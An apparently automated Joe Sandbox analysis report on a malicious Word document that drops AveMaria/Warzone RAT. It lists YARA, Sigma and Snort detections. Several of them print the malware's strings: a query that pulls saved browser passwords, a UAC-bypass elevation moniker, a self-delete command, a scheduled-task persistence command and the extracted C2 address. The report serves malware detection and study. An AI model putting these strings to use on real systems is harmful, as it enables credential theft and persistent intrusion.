8.2.explorer.exe.28daa94.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a950:$a1: \Opera Software\Opera Stable\Login Data 0x4ac78:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a5c0:$a3: \Google\Chrome\User Data\Default\Login Data
8.2.explorer.exe.28daa94.5.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.2.explorer.exe.28daa94.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.explorer.exe.28daa94.5.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.2.explorer.exe.28daa94.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x4cb45:$r1: Classes\Folder\shell\open\command 0x4cb68:$k1: DelegateExecute
8.2.explorer.exe.28daa94.5.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x4c54c:$s1: RDPClip 0x4cc34:$s2: Grabber 0x4c748:$s3: Ave_Maria Stealer OpenSource 0x4c848:$s4: \MidgetPorn\workspace\MsgBox.exe 0x4c57e:$s5: @\cmd.exe 0x4f790:$s6: /n:%temp%\ellocnak.xml 0x4f7c0:$s7: Hey I'm Admin 0x4a0b8:$s8: warzone160
8.2.explorer.exe.28daa94.5.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x4ca98:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x4b2e0:$a2: SMTP Password 0x4a520:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x4f670:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x4c9a0:$a5: for /F "usebackq tokens=*" %%A in (" 0x4ad10:$a6: \Torch\User Data\Default\Login Data 0x4f790:$a7: /n:%temp%\ellocnak.xml 0x4b87c:$a8: "os_crypt":{"encrypted_key":" 0x4f7c0:$a9: Hey I'm Admin 0x4b1a8:$a10: \logins.json 0x4b7f4:$a11: Accounts\Account.rec0 0x4a0b8:$a12: warzone160 0x4c748:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
8.2.explorer.exe.28daa94.5.raw.unpack	AveMaria_WarZone	unknown	unknown	0x4ca98:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x4c874:$str2: MsgBox.exe 0x4cb04:$str4: \System32\cmd.exe 0x4c748:$str6: Ave_Maria 0x4bfe0:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x4b2e0:$str8: SMTP Password 0x4a5c0:$str11: \Google\Chrome\User Data\Default\Login Data 0x4bfac:$str12: \sqlmap.dll 0x4f670:$str16: Elevation:Administrator!new 0x4f790:$str17: /n:%temp%
8.2.explorer.exe.28edf2c.6.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x3c1d8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.2.explorer.exe.28edf2c.6.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x3c1d8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x3c1d8:$c1: Elevation:Administrator!new:
8.2.explorer.exe.28edf2c.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x374b8:$a1: \Opera Software\Opera Stable\Login Data 0x377e0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x37128:$a3: \Google\Chrome\User Data\Default\Login Data
8.2.explorer.exe.28edf2c.6.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.2.explorer.exe.28edf2c.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.explorer.exe.28edf2c.6.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.2.explorer.exe.28edf2c.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x396ad:$r1: Classes\Folder\shell\open\command 0x396d0:$k1: DelegateExecute
8.2.explorer.exe.28edf2c.6.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x390b4:$s1: RDPClip 0x3979c:$s2: Grabber 0x392b0:$s3: Ave_Maria Stealer OpenSource 0x393b0:$s4: \MidgetPorn\workspace\MsgBox.exe 0x390e6:$s5: @\cmd.exe 0x3c2f8:$s6: /n:%temp%\ellocnak.xml 0x3c328:$s7: Hey I'm Admin 0x36c20:$s8: warzone160
8.2.explorer.exe.28edf2c.6.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x39600:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x37e48:$a2: SMTP Password 0x37088:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x3c1d8:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x39508:$a5: for /F "usebackq tokens=*" %%A in (" 0x37878:$a6: \Torch\User Data\Default\Login Data 0x3c2f8:$a7: /n:%temp%\ellocnak.xml 0x383e4:$a8: "os_crypt":{"encrypted_key":" 0x3c328:$a9: Hey I'm Admin 0x37d10:$a10: \logins.json 0x3835c:$a11: Accounts\Account.rec0 0x36c20:$a12: warzone160 0x392b0:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
8.2.explorer.exe.28edf2c.6.raw.unpack	AveMaria_WarZone	unknown	unknown	0x39600:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x393dc:$str2: MsgBox.exe 0x3966c:$str4: \System32\cmd.exe 0x392b0:$str6: Ave_Maria 0x38b48:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x37e48:$str8: SMTP Password 0x37128:$str11: \Google\Chrome\User Data\Default\Login Data 0x38b14:$str12: \sqlmap.dll 0x3c1d8:$str16: Elevation:Administrator!new 0x3c2f8:$str17: /n:%temp%
8.2.explorer.exe.3a0d418.10.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x37410:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x143048:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x37410:$c1: Elevation:Administrator!new: 0x143048:$c1: Elevation:Administrator!new:
8.2.explorer.exe.3a0d418.10.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.2.explorer.exe.3a0d418.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.explorer.exe.3a0d418.10.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.2.explorer.exe.3a0d418.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x348fd:$r1: Classes\Folder\shell\open\command 0x140535:$r1: Classes\Folder\shell\open\command 0x34920:$k1: DelegateExecute 0x140558:$k1: DelegateExecute
8.2.explorer.exe.3a0d418.10.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x34304:$s1: RDPClip 0x13ff3c:$s1: RDPClip 0x349ec:$s2: Grabber 0x140624:$s2: Grabber 0x34500:$s3: Ave_Maria Stealer OpenSource 0x140138:$s3: Ave_Maria Stealer OpenSource 0x34600:$s4: \MidgetPorn\workspace\MsgBox.exe 0x140238:$s4: \MidgetPorn\workspace\MsgBox.exe 0x34336:$s5: @\cmd.exe 0x13ff6e:$s5: @\cmd.exe 0x37530:$s6: /n:%temp%\ellocnak.xml 0x143168:$s6: /n:%temp%\ellocnak.xml 0x37560:$s7: Hey I'm Admin 0x143198:$s7: Hey I'm Admin 0x31e70:$s8: warzone160 0x13daa8:$s8: warzone160
8.2.explorer.exe.3a0d418.10.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x34850:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x140488:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x33098:$a2: SMTP Password 0x13ecd0:$a2: SMTP Password 0x322d8:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x13df10:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x37410:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x143048:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x34758:$a5: for /F "usebackq tokens=" %%A in (" 0x140390:$a5: for /F "usebackq tokens=" %%A in (" 0x32ac8:$a6: \Torch\User Data\Default\Login Data 0x13e700:$a6: \Torch\User Data\Default\Login Data 0x37530:$a7: /n:%temp%\ellocnak.xml 0x143168:$a7: /n:%temp%\ellocnak.xml 0x33634:$a8: "os_crypt":{"encrypted_key":" 0x13f26c:$a8: "os_crypt":{"encrypted_key":" 0x37560:$a9: Hey I'm Admin 0x143198:$a9: Hey I'm Admin 0x32f60:$a10: \logins.json 0x13eb98:$a10: \logins.json 0x335ac:$a11: Accounts\Account.rec0
8.2.explorer.exe.3a2b638.11.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x124e28:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new: 0x124e28:$c1: Elevation:Administrator!new:
8.2.explorer.exe.3a2b638.11.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.2.explorer.exe.3a2b638.11.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.explorer.exe.3a2b638.11.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.2.explorer.exe.3a2b638.11.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x166dd:$r1: Classes\Folder\shell\open\command 0x122315:$r1: Classes\Folder\shell\open\command 0x16700:$k1: DelegateExecute 0x122338:$k1: DelegateExecute
8.2.explorer.exe.3a2b638.11.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x160e4:$s1: RDPClip 0x121d1c:$s1: RDPClip 0x167cc:$s2: Grabber 0x122404:$s2: Grabber 0x162e0:$s3: Ave_Maria Stealer OpenSource 0x121f18:$s3: Ave_Maria Stealer OpenSource 0x163e0:$s4: \MidgetPorn\workspace\MsgBox.exe 0x122018:$s4: \MidgetPorn\workspace\MsgBox.exe 0x16116:$s5: @\cmd.exe 0x121d4e:$s5: @\cmd.exe 0x19310:$s6: /n:%temp%\ellocnak.xml 0x124f48:$s6: /n:%temp%\ellocnak.xml 0x19340:$s7: Hey I'm Admin 0x124f78:$s7: Hey I'm Admin 0x13c50:$s8: warzone160 0x11f888:$s8: warzone160
8.2.explorer.exe.3a2b638.11.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x16630:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x122268:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x14e78:$a2: SMTP Password 0x120ab0:$a2: SMTP Password 0x140b8:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x11fcf0:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x191f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x124e28:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x16538:$a5: for /F "usebackq tokens=" %%A in (" 0x122170:$a5: for /F "usebackq tokens=" %%A in (" 0x148a8:$a6: \Torch\User Data\Default\Login Data 0x1204e0:$a6: \Torch\User Data\Default\Login Data 0x19310:$a7: /n:%temp%\ellocnak.xml 0x124f48:$a7: /n:%temp%\ellocnak.xml 0x15414:$a8: "os_crypt":{"encrypted_key":" 0x12104c:$a8: "os_crypt":{"encrypted_key":" 0x19340:$a9: Hey I'm Admin 0x124f78:$a9: Hey I'm Admin 0x14d40:$a10: \logins.json 0x120978:$a10: \logins.json 0x1538c:$a11: Accounts\Account.rec0
Click to see the 122 entries

Sigma Signatures

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\explorer.exe, ParentImage: C:\Users\user\AppData\Roaming\explorer.exe, ParentProcessId: 2360, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp, ProcessId: 2220, ProcessName: schtasks.exe

Snort Signatures

ETPRO TROJAN Ave Maria/Warzone RAT PingCommand - Source IP: 20.126.95.155 - Destination IP: 192.168.2.22

Timestamp:	20.126.95.155192.168.2.227800491732852329 09/23/22-08:15:52.235686
SID:	2852329
Source Port:	7800
Destination Port:	49173
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket - Source IP: 20.126.95.155 - Destination IP: 192.168.2.22

Timestamp:	20.126.95.155192.168.2.227800491732852326 09/23/22-08:15:32.226881
SID:	2852326
Source Port:	7800
Destination Port:	49173
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT PingResponse - Source IP: 192.168.2.22 - Destination IP: 20.126.95.155

Timestamp:	192.168.2.2220.126.95.1554917378002852328 09/23/22-08:15:32.237815
SID:	2852328
Source Port:	49173
Destination Port:	7800
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) - Source IP: 20.126.95.155 - Destination IP: 192.168.2.22

Timestamp:	20.126.95.155192.168.2.227800491732036735 09/23/22-08:13:32.180190
SID:	2036735
Source Port:	7800
Destination Port:	49173
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin - Source IP: 192.168.2.22 - Destination IP: 20.126.95.155

Timestamp:	192.168.2.2220.126.95.1554917378002036734 09/23/22-08:15:32.237815
SID:	2036734
Source Port:	49173
Destination Port:	7800
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse - Source IP: 192.168.2.22 - Destination IP: 20.126.95.155

Timestamp:	192.168.2.2220.126.95.1554917378002852327 09/23/22-08:13:32.470320
SID:	2852327
Source Port:	49173
Destination Port:	7800
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc	ReversingLabs: Detection: 32%
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc	Virustotal: Detection: 50%			Perma Link

Yara detected AveMaria stealer

Source: Yara match	File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\eDdYRRbouy.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\explorer.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe	Joe Sandbox ML: detected

Source: 8.2.explorer.exe.3a2b638.11.unpack	Avira: Label: TR/AD.MortyStealer.utbzg
Source: 17.0.MSBuild.exe.400000.0.unpack	Avira: Label: TR/Redcap.ghjpt

Source: 00000011.00000003.963762920.00000000006D8000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: AveMaria {"C2 url": "20.126.95.155", "port": 7800}

Exploits

Yara detected UACMe UAC Bypass tool

Source: Yara match	File source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2040, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\mscorlib.pdbXr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB[xp source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdbDr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbUy source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: explorer[1].exe.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT	Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
